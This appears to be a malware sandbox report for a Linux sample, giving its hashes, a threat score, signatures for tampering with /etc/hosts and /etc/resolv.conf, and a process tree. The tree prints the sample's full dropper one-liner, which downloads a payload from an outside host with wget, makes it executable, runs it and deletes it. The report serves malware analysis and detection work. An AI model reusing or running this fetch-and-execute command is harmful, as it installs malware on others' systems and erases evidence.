0e067b219c81ccc9f4fd92a20d1a0a904c5e7ade1e15600a206abfcc671b0105

Analysis

max time kernel
17636s
max time network
137s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
submitted
30-06-2022 19:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0e067b219c81ccc9f4fd92a20d1a0a904c5e7ade1e15600a206abfcc671b0105
Size

101KB
MD5

b46f2416a5b0d9f35232cfd48f274e1f
SHA1

047d97f54df03ff649de1d5cf17fcd0f5f637e5e
SHA256

0e067b219c81ccc9f4fd92a20d1a0a904c5e7ade1e15600a206abfcc671b0105
SHA512

ef069d2d7783b51a3367ed0b304b9e42dd088a925890e6bd4598b5a5aef7cca37b01b6755d3d3e6dac2da477e4bb8d5e0c45e5fbd7d034679234ecd38e1f1b72

Score

8^/10

Malware Config

Signatures

Modifies hosts file 1 IoCs

Adds to hosts file used for mapping hosts to IP addresses.

description	ioc	Process
/etc/hosts	/etc/hosts	wget

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
/etc/resolv.conf	/etc/resolv.conf	wget

./0e067b219c81ccc9f4fd92a20d1a0a904c5e7ade1e15600a206abfcc671b0105
./0e067b219c81ccc9f4fd92a20d1a0a904c5e7ade1e15600a206abfcc671b0105
1⤵
PID:593

/bin/sh
/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
1⤵
PID:594
- /usr/bin/wget
  wget -q http://gay.energy/.../vivid -O .....
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:598
- /bin/chmod
  chmod 777 .....
  2⤵
  PID:599
- ./.....
  ./.....
  2⤵
  PID:600
- /bin/sh
  /bin/sh ./.....
  2⤵
  PID:600
- /bin/rm
  rm -rf .....
  2⤵
  PID:602

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads